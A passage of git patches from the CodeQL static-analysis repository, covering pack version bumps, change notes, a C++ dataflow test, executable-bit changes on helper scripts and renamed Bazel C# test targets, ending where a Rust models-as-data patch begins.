codeql/go-all -version: 3.0.0 +version: 3.0.1-dev groups: go dbscheme: go.dbscheme extractor: go diff --git a/go/ql/src/qlpack.yml b/go/ql/src/qlpack.yml index ecd9cbb13f0..36775d0d862 100644 --- a/go/ql/src/qlpack.yml +++ b/go/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/go-queries -version: 1.1.4 +version: 1.1.5-dev groups: - go - queries diff --git a/java/ql/lib/qlpack.yml b/java/ql/lib/qlpack.yml index 54f56a24606..f892ca1c450 100644 --- a/java/ql/lib/qlpack.yml +++ b/java/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-all -version: 5.0.0 +version: 5.0.1-dev groups: java dbscheme: config/semmlecode.dbscheme extractor: java diff --git a/java/ql/src/qlpack.yml b/java/ql/src/qlpack.yml index eb757401a84..8ee211fb536 100644 --- a/java/ql/src/qlpack.yml +++ b/java/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/java-queries -version: 1.1.10 +version: 1.1.11-dev groups: - java - queries diff --git a/javascript/ql/lib/qlpack.yml b/javascript/ql/lib/qlpack.yml index 4245aa6e5d3..4d568ff4813 100644 --- a/javascript/ql/lib/qlpack.yml +++ b/javascript/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-all -version: 2.2.0 +version: 2.2.1-dev groups: javascript dbscheme: semmlecode.javascript.dbscheme extractor: javascript diff --git a/javascript/ql/src/qlpack.yml b/javascript/ql/src/qlpack.yml index ba7c502b29f..78f0585027b 100644 --- a/javascript/ql/src/qlpack.yml +++ b/javascript/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-queries -version: 1.2.5 +version: 1.2.6-dev groups: - javascript - queries diff --git a/misc/suite-helpers/qlpack.yml b/misc/suite-helpers/qlpack.yml index 834362022be..eeb8f762b13 100644 --- a/misc/suite-helpers/qlpack.yml +++ b/misc/suite-helpers/qlpack.yml @@ -1,4 +1,4 @@ name: codeql/suite-helpers -version: 1.0.13 +version: 1.0.14-dev groups: shared warnOnImplicitThis: true diff --git a/python/ql/lib/qlpack.yml b/python/ql/lib/qlpack.yml index 978dfd96a83..147933b96fe 100644 --- a/python/ql/lib/qlpack.yml +++ b/python/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-all -version: 3.0.0 +version: 3.0.1-dev groups: python dbscheme: semmlecode.python.dbscheme extractor: python diff --git a/python/ql/src/qlpack.yml b/python/ql/src/qlpack.yml index bff5afdf817..d83b6433ac6 100644 --- a/python/ql/src/qlpack.yml +++ b/python/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/python-queries -version: 1.3.4 +version: 1.3.5-dev groups: - python - queries diff --git a/ruby/ql/lib/qlpack.yml b/ruby/ql/lib/qlpack.yml index 41b72629a67..ddf106c95bf 100644 --- a/ruby/ql/lib/qlpack.yml +++ b/ruby/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-all -version: 3.0.0 +version: 3.0.1-dev groups: ruby extractor: ruby dbscheme: ruby.dbscheme diff --git a/ruby/ql/src/qlpack.yml b/ruby/ql/src/qlpack.yml index 7f337d89d6a..43bfe75f566 100644 --- a/ruby/ql/src/qlpack.yml +++ b/ruby/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ruby-queries -version: 1.1.8 +version: 1.1.9-dev groups: - ruby - queries diff --git a/shared/controlflow/qlpack.yml b/shared/controlflow/qlpack.yml index 5401179ac96..268f142bd1b 100644 --- a/shared/controlflow/qlpack.yml +++ b/shared/controlflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/controlflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/dataflow/qlpack.yml b/shared/dataflow/qlpack.yml index 55eb216cc54..6a8e8c3a4ae 100644 --- a/shared/dataflow/qlpack.yml +++ b/shared/dataflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/dataflow -version: 1.1.7 +version: 1.1.8-dev groups: shared library: true dependencies: diff --git a/shared/mad/qlpack.yml b/shared/mad/qlpack.yml index 5c37e609029..125bcad622d 100644 --- a/shared/mad/qlpack.yml +++ b/shared/mad/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/mad -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/rangeanalysis/qlpack.yml b/shared/rangeanalysis/qlpack.yml index bd33c35fe53..62c8c1e46b6 100644 --- a/shared/rangeanalysis/qlpack.yml +++ b/shared/rangeanalysis/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/rangeanalysis -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/regex/qlpack.yml b/shared/regex/qlpack.yml index 07d9f87eb8c..e2cda264dc8 100644 --- a/shared/regex/qlpack.yml +++ b/shared/regex/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/regex -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/ssa/qlpack.yml b/shared/ssa/qlpack.yml index 9a2027d0706..b146ce5bc91 100644 --- a/shared/ssa/qlpack.yml +++ b/shared/ssa/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/ssa -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/threat-models/qlpack.yml b/shared/threat-models/qlpack.yml index d29bd36dd83..6ec41bbcc04 100644 --- a/shared/threat-models/qlpack.yml +++ b/shared/threat-models/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/threat-models -version: 1.0.13 +version: 1.0.14-dev library: true groups: shared dataExtensions: diff --git a/shared/tutorial/qlpack.yml b/shared/tutorial/qlpack.yml index e618abb068b..6677c74eed4 100644 --- a/shared/tutorial/qlpack.yml +++ b/shared/tutorial/qlpack.yml @@ -1,7 +1,7 @@ name: codeql/tutorial description: Library for the CodeQL detective tutorials, helping new users learn to write CodeQL queries. -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/typeflow/qlpack.yml b/shared/typeflow/qlpack.yml index e9d46c074e8..cd9e70bba8c 100644 --- a/shared/typeflow/qlpack.yml +++ b/shared/typeflow/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typeflow -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typetracking/qlpack.yml b/shared/typetracking/qlpack.yml index 9e4717670a7..fbe63f0da01 100644 --- a/shared/typetracking/qlpack.yml +++ b/shared/typetracking/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typetracking -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/typos/qlpack.yml b/shared/typos/qlpack.yml index b3ed91c0926..250f729ab5f 100644 --- a/shared/typos/qlpack.yml +++ b/shared/typos/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/typos -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/shared/util/qlpack.yml b/shared/util/qlpack.yml index 4b66bd8ad92..b327c25a3d9 100644 --- a/shared/util/qlpack.yml +++ b/shared/util/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/util -version: 2.0.0 +version: 2.0.1-dev groups: shared library: true dependencies: null diff --git a/shared/xml/qlpack.yml b/shared/xml/qlpack.yml index 8d8b1b8ee54..76c408c2920 100644 --- a/shared/xml/qlpack.yml +++ b/shared/xml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/xml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true dependencies: diff --git a/shared/yaml/qlpack.yml b/shared/yaml/qlpack.yml index 998a94f4bbf..0c756e1edbb 100644 --- a/shared/yaml/qlpack.yml +++ b/shared/yaml/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/yaml -version: 1.0.13 +version: 1.0.14-dev groups: shared library: true warnOnImplicitThis: true diff --git a/swift/ql/lib/qlpack.yml b/swift/ql/lib/qlpack.yml index 66fd8af358e..7752975faea 100644 --- a/swift/ql/lib/qlpack.yml +++ b/swift/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-all -version: 3.0.0 +version: 3.0.1-dev groups: swift extractor: swift dbscheme: swift.dbscheme diff --git a/swift/ql/src/qlpack.yml b/swift/ql/src/qlpack.yml index ee53e55fe41..ec8e2cb9932 100644 --- a/swift/ql/src/qlpack.yml +++ b/swift/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/swift-queries -version: 1.0.13 +version: 1.0.14-dev groups: - swift - queries From 214da9e9adf74cb7fc17b73b74653a95f2e7582e Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Fri, 6 Dec 2024 19:59:40 -0500 Subject: [PATCH 0914/1267] Java: add change note --- java/ql/lib/change-notes/2024-12-06-file-getname.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/lib/change-notes/2024-12-06-file-getname.md diff --git a/java/ql/lib/change-notes/2024-12-06-file-getname.md b/java/ql/lib/change-notes/2024-12-06-file-getname.md new file mode 100644 index 00000000000..b2d1d271ab5 --- /dev/null +++ b/java/ql/lib/change-notes/2024-12-06-file-getname.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added `java.io.File.getName()` as a path injection sanitizer. From 41425b157f0e2b0176eafedf516a594eae7bbc5f Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Sun, 8 Dec 2024 23:47:34 +0000 Subject: [PATCH 0915/1267] C++: Add test with missing flow. --- .../dataflow/dataflow-tests/dataflow-consistency.expected | 4 ++++ .../dataflow/dataflow-tests/test-source-sink.expected | 2 ++ cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp | 7 +++++++ .../dataflow/dataflow-tests/uninitialized.expected | 3 +++ 4 files changed, 16 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected index 68dad62a95f..ca62e5c9269 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/dataflow-consistency.expected @@ -181,6 +181,10 @@ postWithInFlow | test.cpp:1108:4:1108:4 | p [inner post update] | PostUpdateNode should not be the target of local flow. | | test.cpp:1109:3:1109:4 | * ... [post update] | PostUpdateNode should not be the target of local flow. | | test.cpp:1109:4:1109:4 | p [inner post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1138:3:1138:13 | * ... [post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1138:5:1138:8 | data [inner post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1139:3:1139:7 | * ... [post update] | PostUpdateNode should not be the target of local flow. | +| test.cpp:1139:4:1139:7 | data [inner post update] | PostUpdateNode should not be the target of local flow. | viableImplInCallContextTooLarge uniqueParameterNodeAtPosition uniqueParameterNodePosition diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected index 10a8bef9a33..6a65ddf952c 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test-source-sink.expected @@ -132,6 +132,8 @@ astFlow | test.cpp:1069:9:1069:14 | call to source | test.cpp:1074:10:1074:10 | i | | test.cpp:1069:9:1069:14 | call to source | test.cpp:1082:10:1082:10 | i | | test.cpp:1086:12:1086:12 | a | test.cpp:1088:8:1088:9 | & ... | +| test.cpp:1137:7:1137:10 | data | test.cpp:1140:8:1140:18 | * ... | +| test.cpp:1138:17:1138:22 | call to source | test.cpp:1140:8:1140:18 | * ... | | true_upon_entry.cpp:17:11:17:16 | call to source | true_upon_entry.cpp:21:8:21:8 | x | | true_upon_entry.cpp:27:9:27:14 | call to source | true_upon_entry.cpp:29:8:29:8 | x | | true_upon_entry.cpp:33:11:33:16 | call to source | true_upon_entry.cpp:39:8:39:8 | x | diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp index 60baa08bb8d..33c714a3139 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/test.cpp @@ -1131,4 +1131,11 @@ void (*dispatch_table[])(int) = { void test_dispatch_table(int i) { int x = source(); dispatch_table[i](x); +} + +void test_uncertain_array(int n1, int n2) { + int data[10]; + *(data + 1) = source(); + *data = 0; + sink(*(data + 1)); // $ ast=1138:17 ast=1137:7 MISSING: ir } \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected b/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected index 16f0b799d0a..52bbcabb1e3 100644 --- a/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected +++ b/cpp/ql/test/library-tests/dataflow/dataflow-tests/uninitialized.expected @@ -56,3 +56,6 @@ | test.cpp:796:12:796:12 | a | test.cpp:798:17:798:17 | a | | test.cpp:1086:12:1086:12 | a | test.cpp:1087:3:1087:3 | a | | test.cpp:1086:12:1086:12 | a | test.cpp:1088:9:1088:9 | a | +| test.cpp:1137:7:1137:10 | data | test.cpp:1138:5:1138:8 | data | +| test.cpp:1137:7:1137:10 | data | test.cpp:1139:4:1139:7 | data | +| test.cpp:1137:7:1137:10 | data | test.cpp:1140:10:1140:13 | data | From f74dcc703657a4521a67a57351c48f03090f2e5e Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 9 Dec 2024 10:20:46 +0100 Subject: [PATCH 0916/1267] Make scripts executable --- misc/scripts/check-query-ids.py | 2 ++ misc/scripts/create-change-note.py | 0 misc/scripts/generate-code-scanning-query-list.py | 4 +++- misc/scripts/models-as-data/generate_flow_model.py | 4 ++-- misc/scripts/pre-commit | 0 misc/scripts/shared-code-metrics.py | 10 +++++----- 6 files changed, 12 insertions(+), 8 deletions(-) mode change 100644 => 100755 misc/scripts/check-query-ids.py mode change 100644 => 100755 misc/scripts/create-change-note.py mode change 100644 => 100755 misc/scripts/generate-code-scanning-query-list.py mode change 100644 => 100755 misc/scripts/models-as-data/generate_flow_model.py mode change 100644 => 100755 misc/scripts/pre-commit mode change 100644 => 100755 misc/scripts/shared-code-metrics.py diff --git a/misc/scripts/check-query-ids.py b/misc/scripts/check-query-ids.py old mode 100644 new mode 100755 index aa06ae3a6a5..4158b992ec7 --- a/misc/scripts/check-query-ids.py +++ b/misc/scripts/check-query-ids.py @@ -1,3 +1,5 @@ +#!/usr/bin/env python3 + from pathlib import Path import re import sys diff --git a/misc/scripts/create-change-note.py b/misc/scripts/create-change-note.py old mode 100644 new mode 100755 diff --git a/misc/scripts/generate-code-scanning-query-list.py b/misc/scripts/generate-code-scanning-query-list.py old mode 100644 new mode 100755 index 94b15a33886..72a5d7732d0 --- a/misc/scripts/generate-code-scanning-query-list.py +++ b/misc/scripts/generate-code-scanning-query-list.py @@ -1,3 +1,5 @@ +#!/usr/bin/env python3 + import subprocess import json import csv @@ -52,7 +54,7 @@ class CodeQL: except: self.proc.kill() - def command(self, args): + def command(self, args): data = json.dumps(args) data_bytes = data.encode('utf-8') self.proc.stdin.write(data_bytes) diff --git a/misc/scripts/models-as-data/generate_flow_model.py b/misc/scripts/models-as-data/generate_flow_model.py old mode 100644 new mode 100755 index cfd524066cb..17db03e01e4 --- a/misc/scripts/models-as-data/generate_flow_model.py +++ b/misc/scripts/models-as-data/generate_flow_model.py @@ -140,7 +140,7 @@ Requirements: `codeql` should both appear on your path. generator.setenvironment(sys.argv[1], sys.argv[2]) return generator - + def runQuery(self, query): print("########## Querying " + query + "...") @@ -224,7 +224,7 @@ extensions: if self.dryRun: print("Models as data extensions generated, but not written to file.") sys.exit(0) - + if (self.generateSinks or self.generateSources or self.generateSummaries or diff --git a/misc/scripts/pre-commit b/misc/scripts/pre-commit old mode 100644 new mode 100755 diff --git a/misc/scripts/shared-code-metrics.py b/misc/scripts/shared-code-metrics.py old mode 100644 new mode 100755 index bfc613e5c87..23ce1fd8759 --- a/misc/scripts/shared-code-metrics.py +++ b/misc/scripts/shared-code-metrics.py @@ -1,7 +1,7 @@ #!/bin/env python3 # Generates a report on the amount of code sharing in this repo # -# The purpose of this is +# The purpose of this is # a) To be able to understand the structure and dependencies # b) To provide a metric that measures the amount of shared vs non-shared code @@ -224,7 +224,7 @@ for qlfile in ql_file_index.values(): if lang in language_info: info = language_info[lang] if qlfile.isOnlyInLanguage(lang): - info.addQlFile(qlfile) + info.addQlFile(qlfile) # Determine all package dependencies @@ -276,15 +276,15 @@ def print_package_dependencies(packages): nlines = package.lines + package.total_imported_lines shared_percentage = 100 * package.total_imported_lines / nlines if nlines>0 else 0 print('|', package.link(), '|', package.files, '|', package.lines, '|', package.total_imported_files, '|', package.total_imported_lines, '|', - # ','.join([p.name for p in package.all_dependencies]), + # ','.join([p.name for p in package.all_dependencies]), "%.2f" % shared_percentage, '|') print() def print_language_dependencies(packages): - print_package_dependencies([p for p in packages if p.name.endswith('-all') and p.name.count('-')==1]) + print_package_dependencies([p for p in packages if p.name.endswith('-all') and p.name.count('-')==1]) def list_shared_code_by_language(language_info): - # For each language directory, list the files that are (1) inside the directory and not shared, + # For each language directory, list the files that are (1) inside the directory and not shared, # (2) packages from outside the directory, plus identical files print('| Language | Non-shared files | Non-shared lines of code | Imported files | Imported lines of code | Shared code % |') print('| -------- | ---------------- | ------------------------ | -------------- | ---------------------- | ------------- |') From 3bc822f02120b2a41e231dd489544009fabd4bcb Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 9 Dec 2024 10:31:15 +0100 Subject: [PATCH 0917/1267] Swift: add change note for Swift 6 upgrade --- swift/ql/lib/change-notes/2024-12-09-swift-6.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 swift/ql/lib/change-notes/2024-12-09-swift-6.md diff --git a/swift/ql/lib/change-notes/2024-12-09-swift-6.md b/swift/ql/lib/change-notes/2024-12-09-swift-6.md new file mode 100644 index 00000000000..e32344b28d8 --- /dev/null +++ b/swift/ql/lib/change-notes/2024-12-09-swift-6.md @@ -0,0 +1,4 @@ +--- +category: majorAnalysis +--- +* Upgraded to allow analysis of Swift 6.0.2. From 18560cde9d492da9e4cca5f04723c9931bcaafe8 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Sun, 8 Dec 2024 12:51:40 +0100 Subject: [PATCH 0918/1267] C#: Shorten test target names to make Windows happy. --- csharp/BUILD.bazel | 6 +++--- .../autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel | 3 ++- csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel | 3 ++- .../Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel | 2 +- .../Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel | 2 +- csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel | 3 ++- 6 files changed, 11 insertions(+), 8 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index fbe4213ab9e..4c816766017 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -74,8 +74,8 @@ test_suite( name = "unit-tests", tags = ["csharp"], tests = [ - "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests", - "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests", - "//csharp/extractor/Semmle.Extraction.Tests", + "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:t", + "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:t", + "//csharp/extractor/Semmle.Extraction.Tests:t", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel index 65371c89393..49a26bdb33b 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Autobuild.CSharp.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), diff --git a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel index 10c8c6dc96c..1cf2480403a 100644 --- a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Autobuild.Cpp.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 8be8aaa8408..5a4d49c88fd 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -10,7 +10,7 @@ codeql_csharp_library( "SourceGenerators/**/*.cs", ]), allow_unsafe_blocks = True, - internals_visible_to = ["Semmle.Extraction.Tests"], + internals_visible_to = ["t"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", diff --git a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel index 563168cdf48..e3d0533a776 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel @@ -8,7 +8,7 @@ codeql_csharp_library( srcs = glob([ "*.cs", ]), - internals_visible_to = ["Semmle.Extraction.Tests"], + internals_visible_to = ["t"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching", diff --git a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel index df9799d3f95..4671fa33bb3 100644 --- a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Extraction.Tests", + # short name as we run into long path limitations on Windows + name = "t", srcs = glob([ "*.cs", ]), From 526dbe5901db34cadf27f01b70121e66cc96bce1 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Mon, 9 Dec 2024 12:19:01 +0100 Subject: [PATCH 0919/1267] Address review, also run semmle-util tests. --- csharp/BUILD.bazel | 7 ++++--- .../autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel | 2 +- csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel | 2 +- .../BUILD.bazel | 2 +- .../Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel | 2 +- csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel | 2 +- csharp/extractor/Semmle.Util.Tests/BUILD.bazel | 3 ++- 7 files changed, 11 insertions(+), 9 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 4c816766017..8aaa0d492ef 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -74,8 +74,9 @@ test_suite( name = "unit-tests", tags = ["csharp"], tests = [ - "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:t", - "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:t", - "//csharp/extractor/Semmle.Extraction.Tests:t", + "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", + "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", + "//csharp/extractor/Semmle.Extraction.Tests:et", + "//csharp/extractor/Semmle.Util.Tests:ut", ], ) diff --git a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel index 49a26bdb33b..67f3470712d 100644 --- a/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.CSharp.Tests/BUILD.bazel @@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "acst", srcs = glob([ "*.cs", ]), diff --git a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel index 1cf2480403a..ad8f6e3d1f1 100644 --- a/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel +++ b/csharp/autobuilder/Semmle.Autobuild.Cpp.Tests/BUILD.bazel @@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "acpt", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel index 5a4d49c88fd..96ecccc31aa 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching/BUILD.bazel @@ -10,7 +10,7 @@ codeql_csharp_library( "SourceGenerators/**/*.cs", ]), allow_unsafe_blocks = True, - internals_visible_to = ["t"], + internals_visible_to = ["et"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp", diff --git a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel index e3d0533a776..a2c5a0c1c54 100644 --- a/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.CSharp.StubGenerator/BUILD.bazel @@ -8,7 +8,7 @@ codeql_csharp_library( srcs = glob([ "*.cs", ]), - internals_visible_to = ["t"], + internals_visible_to = ["et"], visibility = ["//csharp:__subpackages__"], deps = [ "//csharp/extractor/Semmle.Extraction.CSharp.DependencyFetching", diff --git a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel index 4671fa33bb3..4d13f7f4fb8 100644 --- a/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel +++ b/csharp/extractor/Semmle.Extraction.Tests/BUILD.bazel @@ -5,7 +5,7 @@ load( codeql_xunit_test( # short name as we run into long path limitations on Windows - name = "t", + name = "et", srcs = glob([ "*.cs", ]), diff --git a/csharp/extractor/Semmle.Util.Tests/BUILD.bazel b/csharp/extractor/Semmle.Util.Tests/BUILD.bazel index 6c3fb64e662..5fde4efdb15 100644 --- a/csharp/extractor/Semmle.Util.Tests/BUILD.bazel +++ b/csharp/extractor/Semmle.Util.Tests/BUILD.bazel @@ -4,7 +4,8 @@ load( ) codeql_xunit_test( - name = "Semmle.Util.Tests", + # short name as we run into long path limitations on Windows + name = "ut", srcs = glob([ "*.cs", ]), From 798b86f6afc7905277e5dbaff4e8edaa15150e85 Mon Sep 17 00:00:00 2001 From: Cornelius Riemenschneider Date: Mon, 9 Dec 2024 12:26:15 +0100 Subject: [PATCH 0920/1267] Disable semmle.util.tests again. --- csharp/BUILD.bazel | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 8aaa0d492ef..49293c27095 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -77,6 +77,7 @@ test_suite( "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", "//csharp/extractor/Semmle.Extraction.Tests:et", - "//csharp/extractor/Semmle.Util.Tests:ut", + # this test suite currently fails, disable for now + # "//csharp/extractor/Semmle.Util.Tests:ut", ], ) From baa248ce652dda9d6d06d3e272bdd998fdf0ae98 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 13:00:52 +0100 Subject: [PATCH 0921/1267] C#: Enable Semmle.Util.Tests. --- csharp/BUILD.bazel | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/csharp/BUILD.bazel b/csharp/BUILD.bazel index 49293c27095..8aaa0d492ef 100644 --- a/csharp/BUILD.bazel +++ b/csharp/BUILD.bazel @@ -77,7 +77,6 @@ test_suite( "//csharp/autobuilder/Semmle.Autobuild.CSharp.Tests:acst", "//csharp/autobuilder/Semmle.Autobuild.Cpp.Tests:acpt", "//csharp/extractor/Semmle.Extraction.Tests:et", - # this test suite currently fails, disable for now - # "//csharp/extractor/Semmle.Util.Tests:ut", + "//csharp/extractor/Semmle.Util.Tests:ut", ], ) From 2f8b04b225bcba82eaa7a2b22bcbe8b875bf5b8f Mon Sep 17 00:00:00 2001 From: Tom Hvitved Date: Thu, 5 Dec 2024 14:41:43 +0100 Subject: [PATCH 0922/1267] Rust: Models-as-data for flow summaries --- .../lib/codeql/rust/dataflow/FlowSummary.qll | 14 +- .../rust/dataflow/internal/DataFlowImpl.qll | 4 +- .../dataflow/internal/FlowSummaryImpl.qll | 16 +++ .../rust/dataflow/internal/ModelsAsData.qll | 98 +++++++++++++ 